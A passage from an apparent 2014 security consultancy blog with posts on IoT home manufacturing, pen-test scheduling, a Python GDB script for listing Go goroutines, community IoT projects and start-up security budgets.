Thursday, November 6, 2014

The Internet of Us - Hardware Nowhere

Never leave your buddy behind in Houston, Texas!

The Holy Trinity of Hack

My friends and I used to joke that there was a "holy trinity" in hacking. You had to understand software, firmware, and hardware in order to bring any value as a security researcher. I believe that is more true today than it has ever been. 

The Internet of Things (IoT) movement means merging these three paradigms into a more tightly bound conglomerate than ever before. Software on your cloud/laptop/desktop links to the firmware on your IoT's hardware, which transmits data upstream to the application firmware on your phone's hardware... bla bla bla

Bla, Bla, Blah!
We get it. Everything is connected. 

A Rad New Whatever

What's really cool about this movement is that we're seeing shifts in everything from architectural design to manufacturing. And the manufacturing is key. Think about the average Internet of Things concept. 

Do you want a Rad New Thing to connect your Blah to your Meh? Of course you do! Your Meh will now be IoT capable to speak to any Blah that understands Meh's protocol! 

We're connected! And it's So Special!
But, where do you pick up a Meh? With all the new IoT products that will saturate the market in the coming years, how does one go out and purchase such a device from the wild ecosystem of choices we'll have? 

I'll tell you how. You won't. The device will be made in your home. 

Get Outta Here

No, really! Have you checked out BotFactory? Their 3D printer, Squink, which survived its Kickstarter round in August, is designed to do this very thing. Sort of. 

Squink is the first step in this direction, and BotFactory clearly has the idea of home manufacturing in mind for their end game (at least they had better, or I'd be a really confused VC). 

Dog, I thought you wuz makin' serious tech, bruh... 
Squink takes 3D printing to the next level by introducing the concept of building printed circuit boards (PCBs) in the home. But, they even promise to go one step further. They state that Squink will be able to function as a Pick and Place machine as well. This means that not only will it be able to print circuit boards on demand, it will be able to place components on the board as well. 

The next step? On demand builds of hardware devices, flashed with firmware downloaded over the Internet. 

Need that Meh for your Blah? You've got it! 

But What Does It All Mean?!

If you're still wondering why this is important, think about how manufacturing affects the cost of the devices you use. Think about Foxconn in China, and the workers who build products for Apple. Think about the increased cost of business not only for those local economies, but for the companies that outsource manufacturing overseas. Think about the massive amount of hardware trash piled up in India, Malaysia, China, and other countries that tear down and harvest the components we throw away. 

No, really....

Simplifying the manufacturing process to the homes that want the devices means the potential to change this existing model. It means decreasing the cost of manufacturing and making only one device instead of one hundred devices just so one customer can acquire that one device. That can disrupt a product's entire pricing model, ecological impact, and availability in a major way. 

This also means that hardware becomes far less important. Instead of hardware seeming like this esoteric voodoo magic box that only a small percentage of us understand, it opens up and becomes widely accessible. Why? 

Because we no longer need to care about it! Anyone will be able to build and play with their own circuit boards on demand at little cost! And they will be able to share their designs for free over the Internet instantaneously! That's incredible! 

Models Gonna Modulate

Essentially, we're on the precipice of another shift in computing. We oscillate back and forth between highlighting the importance of software, to the importance of hardware, and back. We're about to shift again. For how long? Who knows. That doesn't matter. 

What does matter is that security models must account for the upcoming change. How do we secure devices that are made on demand in the home? How will provisioning work? How will the firmware be loaded onto the new device? Can the firmware be signed and delivered over the network? If so, what does that require on the part of the 3D printer? 
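One hedged sketch of the signing question: a symmetric MAC check the printer could run before flashing a downloaded image. Everything here (the key, the image bytes, the tag format) is hypothetical, and a real scheme would more likely use asymmetric signatures so the printer never holds a signing secret:

```python
import hmac
import hashlib

def verify_firmware(image: bytes, tag: bytes, key: bytes) -> bool:
    """Recompute the image's HMAC-SHA256 tag and compare in constant time."""
    expected = hmac.new(key, image, hashlib.sha256).digest()
    return hmac.compare_digest(expected, tag)

# The printer would only flash an image whose tag verifies:
device_key = b"provisioned-at-purchase"         # hypothetical shared key
image = b"\x7fELF...firmware bytes..."          # hypothetical download
tag = hmac.new(device_key, image, hashlib.sha256).digest()
print(verify_firmware(image, tag, device_key))        # → True
print(verify_firmware(image + b"!", tag, device_key)) # → False (tampered)
```

Even this toy version shows the printer-side requirement: the device needs a trust anchor provisioned before the first build ever happens.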

There are many questions that must be answered here, and at Lab Mouse Security, we're preparing our answer. 

As always, if you have questions about IoT security, or want to engage us for a code review, please reach out to us via our Contact Page. 

Best wishes for the Internet of Us!
Don A. Bailey
Lab Mouse Security

Thursday, October 23, 2014

If You Haven't Pen-Tested Now, Wait

Abstinence Or Whatever

This morning, my esteemed peer Shawn Moyer referred to a blog post he wrote in September 2013 on waiting until Q1 for pen-testing, but buying in Q4. He's not wrong. 

Shawn makes strong points about the money and the actual workload on the consultant side. The fact is, teams traditionally get so swamped in Q4 that they do indeed place junior resources where they shouldn't. But, Atredis and I have one thing in common: we don't have to care about that problem. None of us are juniors. We're all principal-level consultants. Nor do we have the overhead of managing or maintaining interns to try and eke out results. 

While Shawn discusses the pen-testing team's side of the fence, I'm discussing the client's issues with scheduling a penetration test in Q4. If you haven't purchased a pen-testing engagement already, you should schedule the test for Q1. 

There Goes E911

Q4 isn't just the most lucrative time of year for tech companies, it's the most profitable time of year for most companies. As a result, everyone is on high alert to manage their resources as effectively as possible. This means not focusing on organizational security in the event of an emergency. Case in point? 

Intrado, the company that manages the majority of the United States' E911 service, had its system fail for over 11 million people across seven states, including the entire state of Washington. No one could make a 911 call during that time period. Intrado happens to be based here in Colorado, and I happen to have personal experience with them. The fact is, they're an exceptional company, and I have been impressed by their above-average engineering expertise. 

Regardless, how do you think the organization - that is one of the country's only third-party 911 contractors - would have reacted if this event occurred during Q4? During Black Friday? During Christmas? God forbid, during Devil's Night? The security and engineering teams would be completely re-tasked toward assessing an event like this, why it occurred, how to remediate it, whether a bad actor was involved, etc. Any penetration test at this point would - and should - immediately stop. 

Point being, whether you're managing E911 infrastructure for the entire country, or simply building a web service that caters to hundreds of thousands of engineers world-wide, prioritization is key. Losing customers is never an acceptable choice. When resources are constrained during an already busy time of year, priorities must align with the business' key goals, and nothing else. 

Schedule Effectively 

So, if you're considering buying penetration services now, don't. Why? It's already going to be the last week of October. Buying services now generally means 
  • one to three weeks of sales process
  • a week or two of scheduling resources on both sides
  • actual engagement: anywhere from 2 days to 2 weeks (on average)
If you're buying services now, this puts your actual engagement starting date anywhere from November 10th to December 1st. If you're on the light side of a test and only need a couple days of effort, you're still looking at remediation through one of the busiest holiday seasons in the country: Thanksgiving. If you're on the heavy side of the test, you're going to be running into mid-December. That means the week of Dec. 15th your team will be scrambling to remediate security issues during *the* two busiest holidays in the world: Christmas and New Year's Day. 
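The lead-time math above can be sketched as simple date arithmetic; the durations are this post's rough averages, not hard data:

```python
from datetime import date, timedelta

purchase = date(2014, 10, 27)  # "the last week of October"

sales_min, sales_max = timedelta(weeks=1), timedelta(weeks=3)  # sales process
sched_min, sched_max = timedelta(weeks=1), timedelta(weeks=2)  # scheduling

earliest_start = purchase + sales_min + sched_min
latest_start = purchase + sales_max + sched_max
print(earliest_start, latest_start)  # → 2014-11-10 2014-12-01
```

Add the engagement itself (two days to two weeks) and remediation, and the calendar lands squarely on the holidays.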

Any critical event during this time means that the results of any penetration test must be put off until the critical event has passed. On average, any overlapping operations/engineering/security event takes between one week and a month to evaluate, remediate, and monitor. During this already swamped time of year, that means the results of any penetration test will be ignored for up to two months if a critical event occurs adjacent to a common vacation or holiday period. This is a total waste of money! 

Don't Kill Money!

A penetration test only has value when its results can be acted on within an effective period of time, meaning weeks after the test has occurred. Otherwise, because of the increasing number of security risks being identified in modern times, any penetration test performed today will have drastically different results than one performed a month from now. 

Remember ShellShock? Heartbleed? Cisco's ASA flaws? LZ4? SSLv3 POODLE? We're seeing more and more game changing flaws coming out, and security teams are already flooded with a To Do list longer than Santa's naughty list. 

Scheduling a pen-test during Q4 is basically asking to be put on Santa's naughty list for knowingly booking an engagement whose output can't be fully utilized in an effective time frame. Don't do it! Don't kill money!

Sure, spend the money today. Book the team. Get the most effective engagement for your budget and your organization's needs. But, schedule it for a time when the output of the engagement will bring the most value to your organization. That, typically, means Q1. 

So, if you want the most value out of a security review, check out Lab Mouse. Even check out Atredis. Book a team that will maximize your investment by providing only top-tier talent, and schedule the engagement only when the timing makes sense for your organization. 

Hey, Intrado, if you need someone that specializes in mobile/embedded/Erlang/telco to help you with a security or code review of your E911 system, give me a shout. I'll give you a good deal since you're local and I already love ya. 

Don A. Bailey
Lab Mouse Security

Tuesday, October 21, 2014

GoLang Debugging - Turning Pennies Into G's

GDB Ain't Great

Our favorite application debugger is awesome. Don't get me wrong, I use it often. Almost daily. But, the fact remains that GDB is dependent on a predefined legacy application architecture. GDB wasn't designed to predict new application architectures. As a result, it doesn't elegantly support alternatively designed stacks, concurrency models, or execution flows. 

That's essentially why GDB has been enhanced with extension capabilities like Sequences, Guile, and yes, even Python. Unfortunately, even the extension system is a bit lacking. Case in point? The existing GoLang GDB script uses a completely outdated extension API that causes exceptions. It wasn't super useful to begin with, either. 

donb@evian-les-bains:~/home/library/golang/go/src/pkg/regexp$ GOMAXPROCS=9 /usr/bin/gdb -q ./regexp.test
Reading symbols from ./regexp.test...done.
Loading Go Runtime support.
(gdb) run
Starting program: /home/donb/home/library/golang/go/src/pkg/regexp/regexp.test 
Program received signal SIGINT, Interrupt.
runtime.usleep () at /home/donb/home/library/golang/go/src/pkg/runtime/sys_linux_amd64.s:77
77              RET
(gdb) info goroutines 
Python Exception <class 'gdb.error'> Attempt to extract a component of a value that is not a (null).: 
Error occurred in Python command: Attempt to extract a component of a value that is not a (null).

In the above example, we see a failure that has been occurring for a year or two now. The debugging process is even documented on the GoLang website under Debugging Go Code With GDB. Yet, when one tries to reproduce the steps outlined in the documentation, the above error occurs. 

Why does this happen? The script packaged with GoLang uses an outdated model for accessing gdb.Value objects, essentially treating them as dictionaries. Because the internals of the gdb.Value no longer support this model, or allow linking via Python generators in the fashion used in the script, simple commands will fail.

Go Routine Yourself

To solve these horrors, we really just need to generate a class that handles retrieval of pertinent values from the GoLang runtime environment. For those not in the know, each GoLang application acts like a kernel, scheduling the execution of each Go routine, monitoring memory allocations, and preparing for garbage collection.

Before you start to become concerned about potentially severe user-land bloat, take a moment to realize that this is actually the correct architecture. Any robust production-quality application must handle resources elegantly by silently monitoring for operating system signals, scheduling and managing thread synchronization, handling per-thread intercommunication, and efficiently allocating and deallocating subsystem resources transparently. GoLang accomplishes all these things, but with surprising elegance and a level of light-weight that even Magdalena Frackowiak would be jealous of.

GoLang executes code in tiny self-contained units called GoRoutines, which are co-routines handled by GoLang's internal scheduler. GoRoutines are not threads; they are simple co-routines that execute under an operating system thread. The benefit of this is that GoRoutines can move transparently across OS threads (pthread, libthread on Solaris, etc.) with almost no cost to the application.

GoRoutines are managed by the C language structure 'struct G'. Operating system threads are managed with the C language structure 'struct M'. Therefore, for every OS thread M, one or more G may run within it. There are other abstractions within the GoLang scheduler, but since those aren't relevant to this discussion we'll leave those abstractions alone for now.

All The G

Internally, GoRoutines are managed under the runtime package. There is a variable called runtime.allg which points to a list of all GoRoutines in the system. A corresponding length variable, runtime.allglen, defines how large this array is. As GoRoutines die, they are marked by their status as Dead. But, unless it is overwritten at some point, the pointer in allg lives on. So, you can inspect what's left of a GoRoutine even after it has moved on to its next iteration.

To solve our problem with GDB, we have to inspect the allg variable. As can be seen in the existing code, this used to be as easy as calling gdb.parse_and_eval. Now that we can no longer act this easily, we have to use what resources are available to us to retrieve values from memory, even if it's a notorious pain in the ass.
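At bottom, every accessor we need boils down to "read a word at base + offset". As a pure-Python illustration of that idea, runnable outside GDB (the memory image here is fabricated, and 160 is the amd64 `goid` offset used in this post):

```python
import struct

GOID_OFFSET = 160  # 'goid' offset within struct G on this amd64 build

def read_u64(mem: bytes, base: int, offset: int) -> int:
    """Interpret 8 little-endian bytes at mem[base + offset] as a uint64."""
    return struct.unpack_from("<Q", mem, base + offset)[0]

# Fabricated struct G image with goid = 17 stored at offset 160:
g = bytearray(256)
struct.pack_into("<Q", g, GOID_OFFSET, 17)
print(read_u64(bytes(g), 0, GOID_OFFSET))  # → 17
```

Inside GDB we can't slurp raw bytes this simply, so the class below performs the same reads through cast expressions handed to gdb.parse_and_eval.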

Let's build a simple Python class around this idea. Because I solved my problem with this code last night in two hours while watching classic episodes of The Rockford Files, it isn't a super great solution. Regardless, it works and frankly because no one else has solved this problem for 2+ years, I don't care if you don't like it.

class Allg:
    __allglen = -1
    __position = 0
    __allg = 0

    __offsets = {
            'status': 152,
            'waitreason': 176,
            'goid': 160,
            'm': 200,
            'sched': 40,
            'sched.pc': 48,
            'sched.sp': 40,
            'stackguard': 120,
            'stackbase': 8,
    }

    def __init__(self):
        # first, fetch the number of active goroutines
        self.__allglen = int(gdb.parse_and_eval("&{uint64}'runtime.allglen'"))
        print("found allglen = {0}".format(self.__allglen))

        # get the next address in the array
        s = "&*{uint64}(&'runtime.allg')"
        self.__allg = int(gdb.parse_and_eval(s))
        print("found allg = {0}".format(hex(self.__allg)))

    def fetch(self):
        if self.__position >= self.__allglen:
            return None

        s = "&*{uint64}(" + "{0}+{1})".format(self.__allg, self.__position*8)
        p = int(gdb.parse_and_eval(s))
        self.__position += 1
        return p

    def Status(self, a):
        s = "&*{int16}(" + "{0}+{1})".format(a, self.__offsets['status'])
        return int(gdb.parse_and_eval(s))

    def WaitReason(self, a):
        s = "&*{int64}(" + "{0}+{1})".format(a, self.__offsets['waitreason'])
        x = int(gdb.parse_and_eval(s))
        s = "&{int8}" + "{0}".format(x)
        return str(gdb.parse_and_eval(s))

    def Goid(self, a):
        s = "&*{int64}(" + "{0}+{1})".format(a, self.__offsets['goid'])
        return int(gdb.parse_and_eval(s))

    def M(self, a):
        s = "&*{uint64}(" + "{0}+{1})".format(a, self.__offsets['m'])
        return int(gdb.parse_and_eval(s))

    def Pc(self, a):
        s = "&*{uint64}(" + "{0}+{1})".format(a, self.__offsets['sched.pc'])
        return int(gdb.parse_and_eval(s))

    def Sp(self, a):
        s = "&*{uint64}(" + "{0}+{1})".format(a, self.__offsets['sched.sp'])
        return int(gdb.parse_and_eval(s))

    def Stackguard(self, a):
        s = "&*{uint64}(" + "{0}+{1})".format(a, self.__offsets['stackguard'])
        return int(gdb.parse_and_eval(s))

    def Stackbase(self, a):
        s = "&*{uint64}(" + "{0}+{1})".format(a, self.__offsets['stackbase'])
        return int(gdb.parse_and_eval(s))

Using the class Allg, I simply identify the address of the runtime.allg symbol in memory, and its corresponding size parameter, runtime.allglen. Once I store these parameters internally, I can just fetch every subsequent GoRoutine's address from the array. Since these routines are allocated sequentially in the array, I can fetch them using a simple iterator. Then, I just pass back the pointer of the actual G* structure. Any time the caller wants to learn more about a specific G*, they just pass back the address to any other function in the class, which will return the value for the corresponding G* field. 
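The fetch-until-None protocol maps naturally onto a Python generator. This wrapper is my own sketch, not part of the original script, and the stub class stands in for Allg so the example can run outside a GDB session:

```python
def iter_goroutines(allg):
    """Yield each G* address until fetch() signals exhaustion with None."""
    while True:
        ptr = allg.fetch()
        if ptr is None:
            return
        yield ptr

class StubAllg:
    """Stand-in for Allg: hands out canned G* addresses, then None."""
    def __init__(self, addrs):
        self._addrs = list(addrs)

    def fetch(self):
        return self._addrs.pop(0) if self._addrs else None

gs = list(iter_goroutines(StubAllg([0xc208002120, 0xc208002480])))
print([hex(g) for g in gs])  # → ['0xc208002120', '0xc208002480']
```

Anything exposing the same fetch() contract, including the real Allg under GDB, can be traversed this way.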

This simple class makes data retrieval very easy. Let's look back at the class that gets invoked when we execute info goroutines on the GDB command line. 

class GoroutinesCmd(gdb.Command):
    "List all goroutines."
    __allg = None

    def __init__(self):
        gdb.Command.__init__(self, "info goroutines", gdb.COMMAND_STACK, gdb.COMPLETE_NONE)

    def invoke(self, _arg, _from_tty):
        self.__allg = Allg()

        # donb: we can retrieve the correctly size pointer with a cast
        # (gdb) python \
        # print("{0}".format(gdb.parse_and_eval("&*{uint64}&'runtime.allg'")))
        while True:
            ptr = self.__allg.fetch()
            # print("fetched ptr = {0}".format(hex(ptr)))
            if not ptr:
                break

            st = self.__allg.Status(ptr)
            # print("status is {0}".format(st))
            w = self.__allg.WaitReason(ptr)
            # print("waitreason is {0}".format(w))
            #if st == 6:  # 'gdead'
                #print("skipping over dead goroutine")

            s = ' '
            m = self.__allg.M(ptr)
            if m:
                s = '*'

            # if the status isn't "waiting" then the waitreason doesn't matter
            if st != 4:
                w = ''
            w2 = w.split('"')
            if len(w2) > 1:
                w = """waitreason="{0}\"""".format(w2[len(w2) - 2])

            pc = self.__allg.Pc(ptr)
            blk = gdb.block_for_pc(pc)
            goid = self.__allg.Goid(ptr)
            a = "fname={0} faddr={1}".format(blk.function, hex(pc))
            # 'sts' maps status codes to printable names; it is defined elsewhere in the original script
            print(s, goid, "{0:8s}".format(sts[st]), a, "&g={0}".format(hex(ptr)), w)

How simple is that? Now, the routine can fetch each G* from within the invoke function's while loop, and print information regarding the runtime. 

donb@evian-les-bains:~/home/library/golang/go/src/pkg/regexp$ GOMAXPROCS=9 /usr/bin/gdb -q ./regexp.test
Reading symbols from ./regexp.test...done.
Loading Go Runtime support.
(gdb) run
Starting program: /home/donb/home/library/golang/go/src/pkg/regexp/regexp.test 
Program received signal SIGINT, Interrupt.
runtime.usleep () at /home/donb/home/library/golang/go/src/pkg/runtime/sys_linux_amd64.s:77
77              RET
(gdb) info goroutines 
found allglen = 5
found allg = 0xc208018000
  16 waiting  fname=runtime.park faddr=0x4134d9 &g=0xc208002120 waitreason="chan receive"
* 17 syscall  fname=runtime.notetsleepg faddr=0x404a56 &g=0xc208002480 
  18 waiting  fname=runtime.park faddr=0x4134d9 &g=0xc208032240 waitreason="GC sweep wait"
  19 waiting  fname=runtime.park faddr=0x4134d9 &g=0xc2080325a0 waitreason="finalizer wait"
* 31 waiting  fname=runtime.gc faddr=0x40a0c6 &g=0xc2080326c0 waitreason="garbage collection"
(gdb) goroutine 31 bt
found allglen = 5
found allg = 0xc208018000
#0  0x000000000040a0c6 in runtime.gc () at /home/donb/home/library/golang/go/src/pkg/runtime/mgc0.c:2329
#1  0x000000000040a150 in runtime.gc () at /home/donb/home/library/golang/go/src/pkg/runtime/mgc0.c:2306
#2  0x00007fff00000000 in ?? ()
#3  0x000000c21531e000 in ?? ()
#4  0x000000000055fc00 in type.* ()
#5  0x0000000000000001 in ?? ()
#6  0x0000000000000000 in ?? ()

We can even use the goroutine command using the same Python class to retrieve information about a specific GoRoutine, and then execute a gdb command based on that routine. Excellent!


This isn't a great way to debug GoLang; there is a lot left to be desired here. For example, stack backtraces are still difficult because of the execution architecture. GoLang's toolchain uses an internal Base Pointer (BP) and doesn't emit one when the binary is generated. This is a legacy of the Plan 9 Operating System assembler, which is intelligent on CISC architectures such as x86-64 because it frees %RBP to be used as a general register. 

But, as a result, GDB doesn't know how the heck to rewind the stack. In fact, you have to inspect the current function's SP adjustment code to identify how far to rewind the stack before popping off the return value. I've accomplished this (the basics) in another change I've made to the GDB script. But, I'll share that another time once I finish dealing with some of the gotchas of this method. 
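To give a flavor of what "inspecting the SP adjustment" means, here is a toy parser that pulls the frame size out of an x86-64 prologue instruction as GDB's disassembler prints it. It only handles the simplest case; the real gotchas are exactly why I'm holding the full script back for now:

```python
import re

def frame_size(insn: str) -> int:
    """Extract N from a 'sub $0xN,%rsp' stack-adjustment instruction."""
    m = re.search(r"sub\s+\$0x([0-9a-fA-F]+),\s*%rsp", insn)
    return int(m.group(1), 16) if m else 0

print(hex(frame_size("sub    $0x18,%rsp")))  # → 0x18
print(frame_size("mov    %rax,%rbx"))        # → 0 (no adjustment found)
```

With the frame size in hand, you can rewind the stack by that amount and pop the return address, which is the basis of the manual backtrace.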

Regardless, for now, you have a simple way to print each GoRoutine during a GDB session. You also have an easy way to identify where in memory each G* exists, and can inspect them with ease, and that's a lot better than you've had it for the past couple of years! 

GoLang Security Auditing 

Are you worried about the real internal security surface of the GoLang application architecture? Are you worried about how the subtleties of the custom scheduler can affect data consistency across co-routines? Are you wondering if the split-stack architecture puts you at risk for memory segment collision under significant client-request pressure? Are you concerned that poorly-written third-party libraries might subvert the otherwise mostly-sound GoLang security model?

Come check out Lab Mouse Security! I've been working with GoLang since the project was made public. I understand the internal runtime architecture, the compiler toolchain, and how the security model affects real-world applications. If you're interested in GoLang security, consider having Lab Mouse evaluate the security of your GoLang application today! 

Don A. Bailey
Lab Mouse Security

Tuesday, October 7, 2014

The Internet of Us

It'll all be OK, little guy. 

It's Not Me, It's You

I've been analyzing and building Internet of Things technology since 2009. At the time, my wife Jessica and I were living in a condo building in Denver's Capitol Hill neighborhood. Nick DePetrillo and I had just started working on The Carmen San Diego project, and I was just launching my career at iSEC Partners after leaving a failing security practice elsewhere. It was a stressful but exciting time. 

One of the ways I dealt with the stress was learning how to solve community problems with technology. Our condo building was tall, and the stairs were common "hotel style" stairwells, not optimal for travel in any scenario. Living on the seventh floor, we opted to take the elevators like everyone else. Normally this would not invite any kind of concern, except that we lived with Jessica's 80 pound golden doodle, Jasper. 

By a court of law!
Jasper is a great guard dog. He's as beautiful as he is vicious, and he is exceptional at protecting us from falling leaves, marauding squirrels, and even actual creepers lurking around Denver's parks. He's also quite disciplined. In elevators, he'd sit patiently and wait for the doors to open without a sound. Jessica did an excellent job of training him. 

The problem would come when the older residents of the condo would get into the elevator. Well, really, only two particular individuals. One was an older lady that enjoyed making a problem out of fading paint on the walls. She relayed to our door man that it was unacceptable for a dog to be in the elevator at the same time as she was. Ridiculous! The insolence of a couple with an approved dog traveling to and from their own condo! Unthinkable! 

I have a feeling that the woman was trying to somehow bully the condo board into allowing her exclusive access to an elevator. Seriously. Regardless, it presented an awkward problem as we didn't appreciate getting a complaint just for getting in the elevator with a dog that wasn't even behaving badly. 

No, Really. It's You.

My solution to this problem was tinkering. I attached a Zigbee module to an Atmel microcontroller, used an Electronic Assembly DOGS LCD screen, a few LEDs, and two LED-backlit push buttons. Result? I had a little mesh-based alerting system that would notify you if Jasper was in the elevator! 

The code was simple. As soon as I left my condo I could press the button on what I named the "Beagle Box" (I was unaware of the Beagle Bone at the time; don't hate). Pushing the button would send a message to all nodes in the mesh that Jasper would be in the elevator for the next 5 minutes. Either the "warning" would time out, or I could log in on another "Beagle Box" in the lobby. 

Class doesn't automatically come with age.
I never ended up deploying the box, because designing it made me realize that there was an easier solution to my problem. I could simply record a few videos of Jasper behaving perfectly in an elevator with other tenants. Then, I wouldn't have to bother maintaining equipment or debugging RF signaling issues throughout the building. 

Point being, I found a social method for diffusing the problem. But, the technology itself made me realize a few key things about the Internet of Things. 

First, people that are eager to create problems can be exposed by technology that disputes their manipulative or sociopathic point of view. 

Second, real community problems can be isolated, evaluated, and potentially mitigated through cost-effective and practical technology. 

It Can Be Us.

I don't see the Internet of Things as just another trend in technology. I see IoT as the next generation of the Internet. But, the Internet is no longer about desktops and servers and intangible opaque applications. The Internet is about Us. We'll be living in the Internet of Us, and we need to think about how to build for Us, not I. Not the 1%. Not the Silicon Valley VC pool. Us. 

And Us isn't easy, is it? Us includes a population that isn't as technologically savvy as my peers. According to Pew Research, one in four teens solely uses a mobile phone to access the Internet. In fact, Pew goes on to state that teens in lower income socio-economic groups are even more likely to use their mobile phone as their primary Internet access point. 

Why is this important? Twenty-five percent (25%) of teens lack access to the Internet in their home, which is why they are focusing on their mobile phone as their pivot point to the Internet. Only half of teens have access to smart phones, which drastically changes the content that teens access, especially at-risk teens. This means they aren't coding. They aren't learning shell commands. They're not even learning about web technology. They're information sinks. 

A much more profound game of telephone is happening right now.
If IoT is going to solve community problems, IoT must be ready to solve the communications issue as well as the socio-academic gap. Communications technology will keep getting cheaper, and soon these numbers will be more representative of a largely connected population. But, we're just talking about the USA. What happens when we expand to the Americas, Europe, Africa, and other evolving regions? How do we ensure technology is seamless, secure, and usable for all academic levels? 

That's quite the challenge, which is why technology usually focuses on a subset of the population. It's easier. And that's fine. But, focusing on easy-to-deliver platforms that enable 1% of the population doesn't solve community need and only widens the gap between the haves and have-nots. 

But First, I Need You. 

To solve these problems we need a cost-effective, secure, and agile platform for the Internet of Things. I am building one based on my research, and am in the middle stages of developing the proof of concept. However, the key metric for success, to me, isn't a snazzy new Thing that solves all our Facebook-connectivity-audio-enablement-bass-drop concerns. It's a thing that binds communities together and enables security, safety, and education. 

I *am* the music! Errr..
For example, have you heard of Shot Spotter? If you've ever seen me give a talk on IoT, you've probably heard me bring it up. Shot Spotter detects gun shots in real time, and passes the information along to law enforcement. It can detect the caliber of a gun, the direction of a shot, whether a shooter is moving (drive-by), and more. That's excellent technology! But, it comes at a steep price. 

Unfortunately, a lot of communities that want to use Shot Spotter are struggling because they have much more immediate concerns to deal with. Detroit and Flint, Michigan, are having serious water treatment and infrastructure problems, resulting in a massive increase in the price of water bills. Do you think the city wants to shell out hundreds of thousands of dollars for a gun shot detection system when basic services are at risk? 

Ominous raven agrees: expensive technology is scary!
What if a secure open source version of the same technology could be built with a simple to use and cost-effective platform? What if we could help secure cities for dollars instead of millions? We can. Internet of Things technology can enable this, but only with the right minds working together. 

I want to bring together lawyers, law enforcement, technologists, city planners, and members of communities to discuss tangible issues that can be addressed with a cross-section of open-source technology, IoT, and information security. The goal isn't to disrupt cities, but to help them restructure their foundation. 

Want to help? Contact me at Lab Mouse Security. As I build the IoT platform, we can find ways to use it for more than the next generation of the Bluetooth speaker. We can change lives for the better. 

Lab Mouse Security

Monday, October 6, 2014

Start-Ups, Information Security, and Budgets

Start Up, not Down. 

The 80's Were Ok, I Guess

As a child of the 80's, I was raised with a lot of mixed messages. These messages took a lot of bizarre forms. I distinctly remember Poison's "Open Up and Say Ahh" being re-released solely because parental groups were concerned that the devilish cover was somehow hypnotizing teens into a riotous hormonal rage. It surprised me, even at the tender age of nine, that somehow covering up the image except for the eyes would appease these groups that supposedly cared about decency. 

Hair Metal Hijab!
George Carlin was more controversial

Weren't the lyrics and hair-metal themes far more of a concern than ridiculous cover art? Either way, I certainly didn't care because it meant that I was finally able to purchase my own copy of the album. And boy, was I thrilled to tear open that cassette packaging - completely ignoring the cover art - to settle into less than an hour of sonic distress that I would soon toss into a pile of tapes and forget.  

Much Better Music
Regardless, this was one of the earliest instances I can recall where adults made insincere compromises in the name of safety (and, I guess, decency). Let's not forget that only three years earlier, Tipper Gore founded Parents Music Resource Center. The PMRC advocated against music that glamorized sex, drugs, and violence (by which I guess they mean Rock and Roll). What they didn't tell us is that Tipper was (at the time) a closet dead head that went on tour in her youth. I bet she and Bill had many a nostalgic night reminiscing about never inhaling

Tipper performing Sugar Magnolia with The Dead 4/20/09

But, I'm Checking Boxes

These behaviors and mixed messages bleed into everything humans do. We project our perception of social norms onto the things we create, whether it's a plane, car, or an Internet connected watch. I've engaged with a growing number of organizations this year that are thinking about security from a similar perspective. It's easy for executives to talk with each other and identify the methods they are using to secure their networks. Because security seems like such an intangible black box, it is difficult to quantify the actual return when a budget is assigned to decrease risk. Therefore, if executives see that their company's activities fall in line with the activities of other companies that have not been publicly compromised, all must be well! 

However, as is often the case with simply checking boxes and moving on, reality is quite different. Home Depot, Target, and other major organizations hit by recent computer-based attacks were all subject to PCI compliance. This means that they were indeed checking boxes, validating patches, and scanning networks to ensure a decreased threat surface. And yet, they were compromised! 

Hackers gonna hack, AMIRITE!?
Penetration tests can assist in providing a base line for infrastructure, but that baseline is simply a snapshot in time. Because of the constant change in the security ecosystem, today's scan will never be representative of tomorrow's network, even if the network components haven't changed. Security is a commodity whose value is constantly in flux, so evaluating risk on this action alone is not only misleading, it's devoid of value. 

Penetration tests cost tens of thousands of dollars and may be performed once a month, or even once per quarter. Yet, if the security landscape of the organization is constantly in flux, these tests provide little insight into the real state of the organization and its assets. As a result, the organization is essentially flushing hundreds of thousands of dollars down the toilet because it hasn't used the output of a penetration test effectively. 

Realigning Organizational Strategy

This trend is even more of a concern as the Internet of Things becomes a part of everyday business. As IoT systems become more ubiquitous in the workplace, new threat models, assessments, and controls must be put into place to identify how to monitor, manage, and deploy these assets. If you thought Bring Your Own Device was bad, consider Bring Your Own Anything. 

In several cases over the past year and a half, clients have had difficulty seeing the value in evaluating the architecture of their IoT product or service. The executives I've spoken with have had concerns about the cost of such a review, which is understandable. When you pay for a service with a seemingly intangible return, it is difficult to pull the trigger. This is especially true if you misjudge your team's security experience and believe that patching and penetration testing have anything to do with threat modeling and architectural strengthening. 

The flip side of the coin exposes the other executives I've spoken with. These executives understand the value of a security review and believe they need it. However, they have trouble allocating budgetary resources toward a security review because it feels too early to spend on consultants for an intangible piece of the technology puzzle. These executives know the value, but have trouble selling it upstream because start-ups have limited resources and must move at a fast pace. 

Doozers solving architectural security concerns (clearly).

These are all understandable problems that I genuinely sympathize with. It's difficult to understand what a valuable security practice is without having gone through the process of incorporating one into a product or service. It's even more difficult to incorporate a valuable security practice when your entire seed budget or A round is focused on bootstrapping a proof-of-concept that will get you partnerships in key verticals, or access to a larger client pool. 

Bottom Line it For Me

Let's go over some numbers, shall we? Maybe this will help elucidate the actual return of a security program integrated into a product or service, whether in development or in use. 

On average, the cost of a penetration test is man-hours multiplied by the days needed to cover the scoped infrastructure, plus overhead, reporting, and on-site requirements. Let's start with a simple example: Average Start Up (ASU). ASU has an average start-up size of twenty people. They have a small in-office datacenter, cloud infrastructure, and hosted physical servers in two separate locations (east coast and west coast). This is Pretty Average. 

Let's say ASU is smart and knows that the penetration testers are skilled, estimating that it will take them 2-3 days to compromise the network. ASU wants data from this project, so they need a well-written report and assistance interpreting the data correctly. Add another 2 days of work. So, let's give the project a full five business-day scope. Two penetration testers are engaged in the process to minimize the time required to scan and evaluate the entire infrastructure. Consultants work a flat eight-hour day. The industry average is around 250 USD per hour. But, since ASU is a start-up, let's presume they get the "friendly" introductory rate of 150 USD per hour. So, we're talking:

Days = 5
Hours per day = 8
Consultants = 2
Price Per Hour = 150 USD
Days * Hours * Consultants * Price = 12,000 USD

Keep in mind that the 12,000 USD is only to obtain the results of the penetration test. Once personnel at the organization implement the changes required to "pass" the test, a new test must be performed. Let's just presume for now that this second test is free, since Pen Test Company (PTC) is running a special for Start Ups like ASU. 

But wait! There's more! ASU gets the benefit of the re-test that gives them a passing grade. But, they keep hearing about all these new vulnerabilities coming out of the woodwork: LZO, LZ4, Heartbleed, BashBug, et cetera. 

